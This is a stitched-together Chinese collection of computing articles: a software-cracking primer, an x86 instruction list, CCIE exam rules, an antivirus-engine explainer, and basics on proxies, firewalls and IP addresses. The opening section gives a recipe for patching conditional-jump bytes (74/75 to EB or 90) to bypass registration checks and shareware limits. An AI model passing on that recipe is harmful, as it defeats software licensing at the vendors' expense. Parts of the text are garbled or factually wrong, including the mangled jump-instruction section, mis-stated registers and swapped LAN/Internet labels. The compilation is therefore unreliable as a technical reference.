je 或jz 若相等则跳(机器码74 或0F84)
jne或jnz 若不相等则跳(机器码75或0F85)
jmp 无条件跳(机器码EB)
jb 若小于则跳
ja 若大于则跳
jg 若大于则跳
jge 若大于等于则跳
jl 若小于则跳
jle 若小于等于则跳
pop 出栈
push 压栈
三.常见修改(机器码)
74=>75 74=>90 74=>EB
75=>74 75=>90 75=>EB
jnz->nop
75->90(相应的机器码修改)
jnz -> jmp
75 -> EB(相应的机器码修改)
jnz -> jz
75->74 (正常) 0F 85 -> 0F 84(特殊情况下,有时,相应的机器码修改)
四.两种不同情况的不同修改方法
1.修改为jmp
je(jne,jz,jnz) =>jmp相应的机器码EB (出错信息向上找到的第一个跳转)jmp的作用是绝对跳,无条件跳,从而跳过下面的出错信息
xxxxxxxxxxxx 出错信息,例如:注册码不对,sorry,未注册版不能…,”Function Not Avaible in Demo” 或 ”Command Not Avaible” 或 ”Can’t save in Shareware/Demo”等 (我们希望把它跳过,不让它出现)
。。。
。。。
xxxxxxxxxxxx 正确路线所在
2.修改为nop
je(jne,jz,jnz) =>nop相应的机器码90 (正确信息向上找到的第一个跳转) nop的作用是抹掉这个跳转,使这个跳转无效,失去作用,从而使程序顺利来到紧跟其后的正确信息处
xxxxxxxxxxxx 正确信息,例如:注册成功,谢谢您的支持等(我们希望它不被跳过,让它出现,程序一定要顺利来到这里)
。。。
。。。
xxxxxxxxxxxx 出错信息(我们希望不要跳到这里,不让它出现)它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据.
1. 通用数据传送指令.
MOV 传送字或字节.
MOVSX 先符号扩展,再传送.
MOVZX 先零扩展,再传送.
PUSH 把字压入堆栈.
POP 把字弹出堆栈.
PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.
POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.
PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.
POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.
BSWAP 交换32位寄存器里字节的顺序
XCHG 交换字或字节.( 至少有一个操作数为寄存器,段寄存器不可作为操作数)
CMPXCHG 比较并交换操作数.( 第二个操作数必须为累加器AL/AX/EAX )
XADD 先交换再累加.( 结果在第一个操作数里 )
XLAT 字节查表转换.
── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即
0-FFH); 返回 AL 为查表结果. ( [BX+AL]->AL )
2. 输入输出端口传送指令.
IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX} )
OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 )
输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,
其范围是 0-65535.
3. 目的地址传送指令.
LEA 装入有效地址.
例: LEA DX,string ;把偏移地址存到DX.
LDS 传送目标指针,把指针内容装入DS.
例: LDS SI,string ;把段地址:偏移地址存到DS:SI.
LES 传送目标指针,把指针内容装入ES.
例: LES DI,string ;把段地址:偏移地址存到ESI.
LFS 传送目标指针,把指针内容装入FS.
例: LFS DI,string ;把段地址:偏移地址存到FSI.
LGS 传送目标指针,把指针内容装入GS.
例: LGS DI,string ;把段地址:偏移地址存到GSI.
LSS 传送目标指针,把指针内容装入SS.
例: LSS DI,string ;把段地址:偏移地址存到SSI.
4. 标志传送指令.
LAHF 标志寄存器传送,把标志装入AH.
SAHF 标志寄存器传送,把AH内容装入标志寄存器.
PUSHF 标志入栈.
POPF 标志出栈.
PUSHD 32位标志入栈.
POPD 32位标志出栈.
二、算术运算指令
ADD 加法.
ADC 带进位加法.
INC 加 1.
AAA 加法的ASCII码调整.
DAA 加法的十进制调整.
SUB 减法.
SBB 带借位减法.
DEC 减 1.
NEC 求反(以 0 减之).
CMP 比较.(两操作数作减法,仅修改标志位,不回送结果).
AAS 减法的ASCII码调整.
DAS 减法的十进制调整.
MUL 无符号乘法.
IMUL 整数乘法.
以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),
AAM 乘法的ASCII码调整.
DIV 无符号除法.
IDIV 整数除法.
以上两条,结果回送:
商回送AL,余数回送AH, (字节运算);
或 商回送AX,余数回送DX, (字运算).
AAD 除法的ASCII码调整.
CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)
CWD 字转换为双字. (把AX中的字的符号扩展到DX中去)
CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)
CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)
三、逻辑运算指令
AND 与运算.
OR 或运算.
XOR 异或运算.
NOT 取反.
TEST 测试.(两操作数作与运算,仅修改标志位,不回送结果).
SHL 逻辑左移.
SAL 算术左移.(=SHL)
SHR 逻辑右移.
SAR 算术右移.(=SHR)
ROL 循环左移.
ROR 循环右移.
RCL 通过进位的循环左移.
RCR 通过进位的循环右移.
以上八种移位指令,其移位次数可达255次.
移位一次时, 可直接用操作码. 如 SHL AX,1.
移位>1次时, 则由寄存器CL给出移位次数.
如 MOV CL,04
SHL AX,CL
四、串指令
DS:SI 源串段寄存器 :源串变址.
ESI 目标串段寄存器:目标串变址.
CX 重复次数计数器.
AL/AX 扫描值.
D标志 0表示重复操作中SI和DI应自动增量; 1表示应自动减量.
Z标志 用来控制扫描或比较操作的结束.
MOVS 串传送.
( MOVSB 传送字符. MOVSW 传送字. MOVSD 传送双字. )
CMPS 串比较.
( CMPSB 比较字符. CMPSW 比较字. )
SCAS 串扫描.
把AL或AX的内容与目标串作比较,比较结果反映在标志位.
LODS 装入串.
把源串中的元素(字或字节)逐一装入AL或AX中.
( LODSB 传送字符. LODSW 传送字. LODSD 传送双字. )
STOS 保存串.
是LODS的逆过程.
REP 当CX/ECX0时重复.
REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX0时重复.
REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX0时重复.
REPC 当CF=1且CX/ECX0时重复.
REPNC 当CF=0且CX/ECX0时重复.
五、程序转移指令
1>无条件转移指令 (长转移)
JMP 无条件转移指令
CALL 过程调用
RET/RETF过程返回.
2>条件转移指令 (短转移,-128到+127的距离内)
( 当且仅当(SF XOR OF)=1时,OP1循环控制指令(短转移)
LOOP CX不为零时循环.
LOOPE/LOOPZ CX不为零且标志Z=1时循环.
LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.
JCXZ CX为零时转移.
JECXZ ECX为零时转移.
4>中断指令
INT 中断指令
INTO 溢出中断
IRET 中断返回
5>处理器控制指令
HLT 处理器暂停, 直到出现中断或复位信号才继续.
WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.
ESC 转换到外处理器.
LOCK 封锁总线.
NOP 空操作.
STC 置进位标志位.
CLC 清进位标志位.
CMC 进位标志取反.
STD 置方向标志位.
CLD 清方向标志位.
STI 置中断允许位.
CLI 清中断允许位.
六、伪指令
DW 定义字(2字节).
PROC 定义过程.
ENDP 过程结束.
SEGMENT 定义段.
ASSUME 建立段寄存器寻址.
ENDS 段结束.
END 程序结束.
网络管理中的Cisco技术 CCIE的考试规则
1、实验室考试的付费
考生的考试费用应在其实验室考试前28天汇至思科公司帐户。目前考生可通过现金,电汇及支票方式支付北京CCIE实验室考试费用。思科公司保留调整CCIE考试费用的权利。
自2004年5月15日起,CCIE部门将只发送一封提醒付费的EMAIL至考生注册的EMAIL地址。如思科公司未在考生实验室考试前28天收到其全额考试费用,考生的考试将被自动取消。在此种情况下,考生如希望继续 参加实验室考试需重新上网注册考试日期并按时交费。
请注意,因银行业务处理速度与思科公司财务部工作安排,考生的汇款约需5-10个工作日到帐,考生应据此安排自己的付费时间以确保思科公司在考生实验室考试前28天收到其全额考试费用
2、实验室考试的取消及改期
考生如需取消或改期已注册的实验室考试,请务必于考前至少28天使用on-line lab scheduling tool (US)进行相应操作。已付费的考生于考前28天之外取消考试可获得全额退款。考生在距考试日期28天之内更改考试日期及地点,或取消考试,其考试费将不被退回。
距实验室考试日期28天内,考生有如下选择:
按注册日期参加考试
EMAIL CCIE部门要求取消考试,在此种情况下考生的考试费将不退回, 考生需间隔30天才能注册下一次考试并需相应付费。
如考生不通知CCIE 部门取消考试,考试当天不出现参加考试,考生将被标为“no show”。在此种情况下考生的考试费将不退回,考生需间隔30天才能注册下一次考试并需相应付费。
3、笔试的有效期及间隔时间
考生必须在通过CCIE笔试18个月内参加第一次实验室考试, 此后至少每12个月参加一次实验室考试以保持笔试成绩的有效. 如考生在通过笔试三年之内未能通过实验室考试,需重新参加并通过笔试考试以取得再次注册实验室考试的资格. 笔试考试的次数没有限制,但每次笔试考试之间需间隔72小时。<
4、实验室考试的间隔时间
所有考生每次实验室考试之间的最小时间间隔为30天, 此30天应从前次考试后第一天算起。
5、实验室考试的时间安排
除CCIE部门另行通知, 实验室考试的具体开始时间以给考生的考试预订确认为准. 请考生使用on-line lab scheduling tool (US)确保个人联系信息的正确以便我们及时通知任何变化. 如考生对实验室考试开始时间有任何疑问请联系CCIE考生服务部门。
请注意, 如考生于实验室考试开始两小时后到达考场将不被允许参加考试, 如考生在实验室考试开始后两小时之内到达考场, 将被允许参加考试,但需与其他考生一道完成考试,而不被另行延长考试时间
6、双重考试预订
CCIE考生在任何时间,任何地点只允许有一个考试座位的预订. 在一个或多个考场的双/多重考试座位的预订将不被注册系统允许
7、考场规则
参加CCIE笔试及实验室考试的考生不允许携带任何与考试有关的物品进出考场,包括笔记本电脑. 实验室考试当天请携带个人身份证以证明考生身份. 考生不得与除CCIE部门工作人员以外任何人讨论试题. 实验室考试前考生将被要求签署Non-Disclosure Agreement (US)和 Confidentiality Agreement (US)。
所有完成CCIE实验室考试所需Cisco documentation 以hardcopy 及CD-ROM media方式提供。考生在实验室考试期间如有问题请寻求CCIE考官帮助。
以上考场规则对维护CCIE项目的质量及公正性至关重要. 违反考场规则的考生将视情节轻重处以取消考试资格至少一年的处罚。
窥探杀毒软件引擎相关技术
病毒和反病毒产品是天生的冤家,由于病毒永无休止的存在,反病毒产品这片领域自然也会出现众多厂商来分割的局面,因此也就衔生出了多种杀毒引擎技术。
杀毒引擎是决定一款杀毒软件技术是否成熟可靠的关键,什么是杀毒引擎呢?简言之,它就是一套判断特定程序行为是否为病毒程序或可疑程序的技术机制,引擎不仅需要具备判断病毒的能力,还必须拥有足够的病毒清理技术和环境恢复技术,如果一款杀毒产品能查出病毒但是却无法清除、或者无法将被病毒破坏的系统环境成功恢复,那它也只能是鸡肋。为了达到查杀病毒的目的,杀毒引擎自身要实施的行为就要比病毒还病毒,例如,为了及时获得环境变动的监控数据,一些杀毒引擎采用DLL的钩子技术将自身注入系统进程中,这一行为和DLL木马无异;而为了成功拦截查杀驱动级别木马Rootkit,杀毒引擎更需要将自身的一部分作为驱动形式运行,以便进入系统内核领域……说到这里,一些计算机配置较低的用户应该能明白,为什么自己安装杀毒软件后计算机速度明显变慢了,这多半是因为杀毒软件的“文件监控”等功能导致的,因为这一功能的实现原理就如文件型病毒的寄生过程一样,只不过文件型病毒是守候在内存中伺机感染每一个打开的文件,而“文件监控”功能是时刻驻守在内存里检查每一个打开的文件是否存在病毒,两者导致的后果都是程序载入内存的时间增加,在低配置的计算机表现得比较明显罢了。
1.守住每一个关卡——程序行为捕获
每个程序运行时都需要进行各种交互动作,如收发网络数据、响应某个触发事件、文件读写操作等,这些交互都被称为“行为”(Action),这个周期过程是可以被跟踪记录的,这就是杀毒引擎必须干涉的第一步,当杀毒软件的环境监视模块启动后,它会嵌入系统的操作接口,使得任何非核心程序和除了杀毒软件自身程序的运作过程都要被它实时监视,这一技术通常通过钩子技术和驱动层挂载实现,每个杀毒软件厂商都预先定义了一套病毒行为判断规范,即在一个给定的范围和置信度下,判断相关操作是否为合法。例如一个代码执行后被发现试图将自己写入用户请求执行的程序文件体内、或进行特定的复制动作和添加注册表操作,则可将其怀疑为病毒,移交给查毒过程的第二步进一步判断处理。
一部分厂商因为与操作系统厂商存在合作关系,因而获得了较其他厂商杀毒产品要高的操作系统特权,所以他们采用的方案是基于系统最底层的系统核心驱动,这种实现方式是最安全的,或者说最高级的实现方式,至今只有Norton获得了这个特权。随着病毒技术逐渐渗透到Rootkit层次,过去的Hook技术逐渐有点力不从心,于是杀毒厂商开始转入驱动方案,当然,由于没有操作系统厂商的授权,他们并无法实现最底层的核心驱动解决方案,于是杀毒厂商编写了一个称为“软件驱动”的中间件,用于在系统中产生一个虚拟硬件。众所周知,在操作系统中,只有驱动模块能通过一个“硬件抽象层(HAL)”的通讯接口而到达系统底层,如今流行的Rootkit木马也是采用驱动形式进入系统核心的,因此杀毒厂商使用“软件驱动”来实现底层监视的方案是要比一般的Hook技术效果显著的,但是这也不可避免会出现一些问题,如果这个“软件驱动”存在缺陷或者被某些程序异常终止(例如出现未预料的错误),在系统底层无任何保护措施的环境下,最直接的一个后果就是系统蓝屏崩溃,造成可能的损失。
小知识:系统的几个“层”
操作系统作为一个复杂的运作体系,其内部是必须实现一定的功能模块来进行分工合作的,这些功能模块像金字塔一样层层堆积,形成了系统的几个“层”,分别是系统核心层、硬件抽象层、用户层。
系统核心层(Kernel Layer)位于整个操作系统的最底层,负责系统的基本运作,在这一层里的所有行为都由系统内置的指令来实现,所有外界因素都不会对这一处的行为造成影响。能直接进入这个层交互的程序不多,除了操作系统自身,第三方厂商若要能在此层直接工作,必须和系统厂商建立合作关系,使用系统厂商提供的接口函数才能进入。目前能在这个层面直接工作的杀毒软件只有赛门铁克的Norton AntiVirus。
硬件抽象层(Hardware Abstraction Layer)是美国微软公司为了便于操作系统在不同硬件结构上进行移植而提出的将系统底层与硬件相关的部分独立运作的思想,HAL为系统实现了“硬件无关性”,即在不同的硬件平台上,硬件与操作系统的交互也不会有所差异,这样一来,硬件厂商开发驱动的难度便能大大降低,HAL将硬件的接口细节隐藏起来,并为操作系统提供一个标准硬件交互接口,目前所有的硬件驱动都工作在这个层面上,当外界硬件存在指令请求时,驱动程序响应请求并将指令通过HAL转换为系统核心层能理解的指令交给内核执行,如果未找到相应的驱动程序类型,则将其视为“默认硬件”(Default Hardware)处理,什么叫“默认硬件”呢?最简单的例子就是进入安全模式,这时候大部分驱动程序不会被加载,此时的系统便是工作于“默认硬件”上。大部分使用“软件驱动”解决方案的杀毒软件就是在HAL层上虚拟了一个硬件来达到与核心层交互的效果,如McAfee、卡巴斯基等,瑞星2006也是通过这个方案实现了内核交互。
用户层(User Layer)就是平时我们直接看到的部分,例如桌面,大部分杀毒软件也是在这一层运行的,主要用于用户接口交互和将指令传递到杀毒引擎。一般运行于Ring3的程序行为也产生于此,一个应用程序产生的指令要求首先被传递到HAL层,HAL层将其解释处理为核心层可以识别的指令串,然后提交给核心层最后进入CPU的指令处理循环,CPU处理完毕后将结果反向送回到用户层上的应用程序,最终得到运算结果。
2.检测的核心——基于引擎机制的规则判断
这一步环节可以称之为病毒判断的核心阶段,一个好的杀毒引擎能在这个阶段识别出相当规模的病毒,其原理是在引擎中内置一部分病毒的特征代码,称为“基于特征码的静态扫描技术”,即杀毒引擎直接在文件中查找自身携带的特征代码.
3.在翰林辞典中穿梭——引擎与病毒特征库的交互
由于上述原因,如今的杀毒软件已经不得不采用外部数据库连接的方法来达到识别病毒的效果,病毒特征代码数据库中以特定格式储存了各种病毒的行为标识和静态代码,在工作时,杀毒引擎需要将捕获到的程序行为转换为它自身可以识别的行为标识和静态代码,然后进入病毒特征代码数据库中查询并期待其返回查询结果,因此这个步骤是整个杀毒过程中最慢的,但是不可否认,当前的杀毒软件对大量病毒的识别都是在这个阶段完成的。因此一个足够庞大的病毒库往往能够弥补杀毒引擎的不足之处,但是当今病毒越发复杂和繁多,如此长期以往,病毒特征库将会有一天过于臃肿而导致不良后果,要解决这个问题,只能在核心技术上尽量实现将病毒检测工作在第二步完成,只可惜在当前我们仍然没有能够实现这个想法的杀毒引擎技术,因此如今的杀毒软件或多或少都依赖着一个几十MB的病毒特征库来维持工作,杀毒厂商在杀毒引擎核心未进行关键修改时发布的病毒更新其实也就是为了往这个特征数据库中添加最新发现的病毒数据,以达到查杀新病毒的作用。
“基于特征码的静态扫描技术”的最大弱点在于它无法发现和查杀“未公开”或“未收录”的病毒,由于它的大部分判断依据来自病毒特征代码数据库,一旦用户被感染了病毒中的“0day”或“私人后门”,杀毒软件就无能为力,甚至落得个被病毒终结运行的下场,当然,由于杀毒软件自身的校验机制,一般不会有病毒愚蠢到去感染杀毒软件,但是如果一个杀毒软件被病毒终止了,它就无法对用户的计算机实施病毒防护了,但是如何判断阻止由病毒发出的关闭指令,而不影响用户正常点击杀毒软件自身提供的“退出”功能,这也是个难题。
一部分杀毒引擎会通过自身的病毒行为判断规范来“怀疑”某些未收录在数据库中的程序为病毒,并询问用户需要什么解决方案,一般情况下,杀毒软件最折衷的默认解决方案是将被怀疑动机不纯的程序文件改名备份到一个被称为“隔离区”的文件夹中,然后将该原始文件销毁。这样做或许能达到查杀未知病毒的目的,但是我们也不能忽视其可能带来的严重后果,例如某个关键文件或重要文档感染了病毒,如果杀毒软件不由分说就将其消灭,那就很可能引发系统崩溃甚至经济损失,因为一个健全稳妥的查杀过程和环境恢复是很重要的。
4.月光宝盒——病毒查杀和系统环境恢复
当杀毒引擎检测到病毒时,需要分为两种情况对待,首先是尚未来得及进行感染或破坏行为的病毒,在这种情况下杀毒引擎只需要简单删除文件就可以了,但是日常操作中用户面临最多的还是已经被病毒实施感染破坏行为后的系统环境,在这种情况下,杀毒引擎必须在使用适当的方式查杀病毒后,根据病毒特征库中记录的病毒行为来智能判断当前系统环境遭受破坏的情况并进行恢复,例如对于受病毒感染的文件,杀毒引擎必须根据一定的算法在文件体内找出病毒代码寄生的部分并给予清除,这个过程必须非常谨慎,否则直接的后果就是导致原文件被破坏,这样的杀毒就毫无意义了。而对于非文件型的木马和恶意程序,由于它们会通过各种方式篡改系统注册表甚至系统文件来达到加载自身之目的,杀毒引擎在清除了这些病毒后能否准确有效的恢复受破坏的系统环境,就是对杀毒引擎的最大挑战。病毒隐藏技术已经从最初的简单加载单一启动项,演化到今天的多重启动项、进程互相保护、线程监视、远程注射、可执行文件关联、服务项目加载、驱动形式加载等方式,甚至采用多项结合的方法,使得查杀工作变得十分困难,甚至只要遗漏了一个文件未能清除,病毒便能卷土重来,因此,如何有效准确的判断和修复受损环境,也是衡量杀毒引擎技术是否成熟的关键。
以上说的是杀毒引擎完整工作过程的原理,那么,它所采取的技术有哪些呢?目前,主流的技术有两种:虚拟机技术、实时监控技术。除此之外,还有两种最新的技术仍在试验阶段,分别是智能码标识技术和行为拦截技术。
1.虚拟机技术
一提起虚拟机,部分读者可能就会联想到VMWare去了,然而这里提到的虚拟机并非如此。在反病毒界里,虚拟机也被称为通用解密器,已经成为反病毒软件中最重要的部分之一。杀毒引擎的虚拟机技术并非是为病毒提供一套计算机仿真系统,让其在内部折腾直到暴露出病毒行为特征,在这里的虚拟机是指杀毒引擎模拟出一个仿真CPU,这个“CPU”具备和真正CPU等同的指令分析功能,杀毒引擎将待检测的程序代码读入“CPU”中逐条指令循环执行,直到出现特定情况才结束工作,在这个过程中探知程序是否具备病毒行为特征或者暴露出病毒特征码。这就是杀毒引擎的“虚拟机技术”,它的目的就是让程序文件在没有实际运行的情况下得到运行后的结果,最初虚拟机技术是为了对付变形病毒而产生的,因为变形病毒会将自身代码以一定的方式进行多次变换,这样传统静态特征码扫描技术就对其无能为力,因为它根本无法确认特征码,但是即使再强悍的变形病毒也不可避免在运行时出现一段相对固定的机器码,否则它自身也无法正常运行完成变形过程,而由于这段机器码只有在运行时才能被捕获到,因此工程师开发了“虚拟机技术”诱使病毒在杀毒引擎产生的“CPU”里尽情运行,而后根据其固定机器码匹配病毒特征数据库中的静态特征来判断这个程序是否病毒。虽然这个技术可能会导致误报,但是仍不能否认其是一种有效的方法。
2.实时监控技术
实时监控技术,说白了其实就是一个文件监视器,它会在文件打开、关闭、修改等操作时将其拦截并送入查毒模块进行分析,而在如今的操作系统中要实现对所有文件操作的拦截并非易事,这需要涉及系统核心,因此,这里所采取的方案原型,就是“软件驱动”。通过驱动进入核心,便能获知每个文件的操作情况并做出反应了。这项技术的难度在于驱动代码的编写,由于内核没有异常处理过程,在这里执行的代码稍有一点错漏都能直接导致系统崩溃,且驱动与用户层的实时交互也需要一套复杂的实现方案,因此只有一定实力的厂家才实现这项技术,且实现了这项技术的厂家大部分都会连同虚拟机技术、静态特征码扫描技术一起结合起来,最终形成自己的产品。
【编后语:最有效的杀毒技术还是特征码!】
专家支招ADSL用户应如何保护自己的安全
因此,ADSL 用户应该采取以下措施保护自己的安全:
安装杀毒软件和个人防火墙,并记得及时升级(瑞星杀毒软件每个工作日升级三次,尽量设置好升级频率)。
注意打好系统补丁,建议采用安全性较好的操作系统。因为微软已经对某些操作系统例如 Window 98停止了技术支持,使用这些系统可能造成安全风险。
玩游戏或者使用网络银行时,一定要开启杀毒软件的实时监控功能和个人防火墙,进行防护。
如果不愿意出门购买光盘介质的单机版杀毒软件,可以应用瑞星杀毒软件下载版,但要注意的是,瑞星下载版软件不包括个人防火墙,最好另外安装个人防火墙下载版,才可以构成一个比较完整的防护体系。
如果使用IE浏览器上网,最好安装“卡卡安全助手”,它可以阻止弹出式广告窗口和浏览器插件,比较好的保护用户的安全。
教育网用户如何防范黑客攻击?
安装杀毒软件和个人防火墙,并记得及时升级(瑞星杀毒软件每个工作日升级三次,尽量设置好升级频率)。
注意打好系统补丁,建议采用安全性较好的操作系统。因为微软已经对某些操作系统例如 Window 98 停止了技术支持,使用这些系统可能造成安全风险。
充分利用用户帐户的安全性,对电脑进行一般操作如玩游戏、上网时应使用一般权限账户,不要用管理员账户。
尽量对个人防火墙和 IE 浏览器采用高安全设置,尤其是玩网络游戏、使用网络银行的时候更应小心。
如果电脑运行出现异常,如莫名其妙的运行变慢、程序出现未知错误、浏览器上出现不明用途的链接等,最好采用瑞星杀毒软件、瑞星杀毒软件下载版或瑞星在线杀毒对电脑进行全面扫描。
什么是代理服务器以及代理服务器的作用
大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。
更重要的是:代理服务器是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型的对话层,从而起到防火墙的作用。
鉴于上述原因,代理服务器大多被用来连接INTERNET(局域网)和INTRANET(国际互联网)。在国内,所谓中国多媒体公众信息网和教育网都是独立的大型国家级局域网,是与国际互联网隔绝的。出于各种需要,某些集团或个人在两网之间开设了代理服务器,如果我们知道这些代理服务器的地址,就可以利用它到达国外网站。
什么是HTTP代理:www对于每一个上网的人都再熟悉不过了,www连接请求就是采用的http协议,所以我们在浏览网页,下载数据(也可采用ftp协议)是就是用http代理。它通常绑定在代理服务器的80、3128、8080等端口上。
什么是socks代理:相应的,采用socks协议的代理服务器就是SOCKS服务器,是一种通用的代理服务器。Socks是个电路级的底层网关,是DavidKoblas在1990年开发的,此后就一直作为Internet RFC标准的开放标准。Socks 不要求应用程序遵循特定的操作系统平台,Socks 代理与应用层代理、 HTTP 层代理不同,Socks 代理只是简单地传递数据包,而不必关心是何种应用协议(比如FTP、HTTP和NNTP请求)。所以,Socks代理比其他应用层代理要快得多。它通常绑定在代理服务器的1080端口上。如果您在企业网或校园网上,需要透过防火墙或通过代理服务器访问 Internet就可能需要使用SOCKS。一般情况下,对于拨号上网用户都不需要使用它。注意,浏览网页时常用的代理服务器通常是专门的http代理,它和SOCKS是不同的。因此,您能浏览网页不等于 您一定可以通过SOCKS访问Internet。 常用的防火墙,或代理软件都支持SOCKS,但需要其管理员打开这一功能。如果您不确信您是否需要SOCKS或是否有SOCKS可用,请与您的网络管理员联系。
在实际应用中SOCKS代理可以用作为:电子邮件、新闻组软件、网络传呼ICQ、网络聊天MIRC和使用代理服务器上联众打游戏等等各种游戏应用软件当中。
防火墙的定义、类型及使用防火墙的意义
防火墙就是一个位于计算机和它所连接的网络之间的软件或硬件。该计算机流入流出的所有网络通信均要经过此防火墙。
防火墙的功能
防火墙对流经它的网络通信进行扫描,这样能够过滤掉一些攻击,以免其在目标计算机上被执行。防火墙还可以关闭不使用的端口。而且它还能禁止特定端口的流出通信,封锁特洛伊木马。最后,它可以禁止来自特殊站点的访问,从而防止来自不明入侵者的所有通信。
为什么使用防火墙
防火墙具有很好的保护作用。入侵者必须首先穿越防火墙的安全防线,才能接触目标计算机。你可以将防火墙配置成许多不同保护级别。高级别的保护可能会禁止一些服务,如视频流等,但至少这是你自己的保护选择。
防火墙的类型
防火墙有不同类型。一个防火墙可以是硬件自身的一部分,你可以将因特网连接和计算机都插入其中。防火墙也可以在一个独立的机器上运行,该机器作为它背后网络中所有计算机的代理和防火墙。最后,直接连在因特网的机器可以使用个人防火墙。
防火墙的概念
在网络中,所谓“防火墙”,是指一种将内部网和公众访问网(如Internet)分开的方法,它实际上是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度,它能允许你“同意”的人和数据进入你的网络,同时将你“不同意”的人和数据拒之门外,最大限度地阻止网络中的黑客来访问你的网络。换句话说,如果不通过防火墙,公司内部的人就无法访问Internet,Internet上的人也无法和公司内部的人进行通信。
防火墙的功能
防火墙是网络安全的屏障:
一个防火墙(作为阻塞点、控制点)能极大地提高一个内部网络的安全性,并通过过滤不安全的服务而降低风险。由于只有经过精心选择的应用协议才能通过防火墙,所以网络环境变得更安全。如防火墙可以禁止诸如众所周知的不安全的NFS协议进出受保护网络,这样外部的攻击者就不可能利用这些脆弱的协议来攻击内部网络。防火墙同时可以保护网络免受基于路由的攻击,如IP选项中的源路由攻击和ICMP重定向中的重定向路径。防火墙应该可以拒绝所有以上类型攻击的报文并通知防火墙管理员。
防火墙可以强化网络安全策略:
通过以防火墙为中心的安全方案配置,能将所有安全软件(如口令、加密、身份认证、审计等)配置在防火墙上。与将网络安全问题分散到各个主机上相比,防火墙的集中安全管理更经济。例如在网络访问时,一次一密口令系统和其它的身份认证系统完全可以不必分散在各个主机上,而集中在防火墙一身上。
对网络存取和访问进行监控审计:
如果所有的访问都经过防火墙,那么,防火墙就能记录下这些访问并作出日志记录,同时也能提供网络使用情况的统计数据。当发生可疑动作时,防火墙能进行适当的报警,并提供网络是否受到监测和攻击的详细信息。另外,收集一个网络的使用和误用情况也是非常重要的。首先的理由是可以清楚防火墙是否能够抵挡攻击者的探测和攻击,并且清楚防火墙的控制是否充足。而网络使用统计对网络需求分析和威胁分析等而言也是非常重要的。
防止内部信息的外泄:
通过利用防火墙对内部网络的划分,可实现内部网重点网段的隔离,从而限制了局部重点或敏感网络安全问题对全局网络造成的影响。再者,隐私是内部网络非常关心的问题,一个内部网络中不引人注意的细节可能包含了有关安全的线索而引起外部攻击者的兴趣,甚至因此而暴漏了内部网络的某些安全漏洞。使用防火墙就可以隐蔽那些透漏内部细节如Finger,DNS等服务。Finger显示了主机的所有用户的注册名、真名,最后登录时间和使用shell类型等。但是Finger显示的信息非常容易被攻击者所获悉。攻击者可以知道一个系统使用的频繁程度,这个系统是否有用户正在连线上网,这个系统是否在被攻击时引起注意等等。防火墙可以同样阻塞有关内部网络中的DNS信息,这样一台主机的域名和IP地址就不会被外界所了解。
IP基础知识 私网IP和公网IP的关联区别
公网ip
用邮寄系统作比喻。有公网ip,相当于说你有一个详细的地址,你可以写信寄给别人,别人也可以用这个地址和你进行各种通讯。
现在来看看没有公网ip是一种什么局面。这就像是住在一个大院里,所有进出邮件都由传达室转交。如果是普通的邮件,可以放在传达室,传达室的大爷大妈看到你了就会转交给你,或者你自己去传达室看看,这不重要,反正虽然经过了一点波折,还是可以看到邮件的。现在假设以下如果来了个挂号,邮局的人员说:必须本人签收。传达室的大爷就说了:对不起,所有的邮件都要经过我中转~。于是邮局的人员只好把信带回去了……
实际情况和这个差不多,所谓没有公网ip,就是说你的机子并非直接连接上internet,而是所有通讯经过一台代理(一般是透明网关)进行中转,这时候问题就来了,就会有一些通讯无法在这种机制下顺利进行。比如两个网吧之间,网吧的机子是没有公网ip的典型例子,通常两个网吧之间就不能互相通过qq传送文件。又比如没有公网ip,上网玩对战游戏通常会有问题,你建立的游戏别人无法加入等等。
私网ip
私网IP就是就是国际上分配ip的时候,留出一部分ip,不用于在internat上用可用于内部局域网等,虽然功能一样,但不能在internat上使用。属于非注册地址,专门为组织机构内部使用。
以下表列出留用的内部寻址地址
A类 10.0.0.0 8
B类 172.16.0.0--172.31.0.0
C类 192.168.0.0--192.168.255.0
查看本机IP的方式:
可以使用ipconfig命令:开始 – 运行 – 输入命令cmd – 在命令行窗口输入命令ipconfig,即可查看本机IP。
巧区别各类电脑问题...是病毒?还是故障?
在清除计算机病毒的过程中, 有些类似计算机病毒的现象纯属由计算机硬件或软件故障引起, 同时有些病毒发作现象又与硬件或软件的故障现象相类似, 如引导型病毒等。这给用户造成了很大的麻烦, 许多用户往往在用各种查解病毒软件查不出病毒时就去格式化硬盘, 不仅影响了硬盘的寿命, 而且还不能从根本上解决问题。所以, 正确区分计算机的病毒与故障是保障计算机系统安全运行的关键。
一、计算机病毒的现象与查解方法
在一般情况下, 计算机病毒总是依附某一系统软件或用户程序进行繁殖和扩散, 病毒发作时危及计算机的正常工作, 破坏数据与程序, 侵犯计算机资源。计算机在感染病毒后, 总是有一定规律地出现异常现象:
①屏幕显示异常, 屏幕显示出不是由正常程序产生的画面或字符串, 屏幕显示混乱;
②程序装入时间增长, 文件运行速度下降;
③用户没有访问的设备出现工作信号;
④磁盘出现莫名其妙的文件和坏块, 卷标发生变化;
⑤系统自行引导;
⑥丢失数据或程序, 文件字节数发生变化;
⑦内存空间、磁盘空间减小;
⑧异常死机;
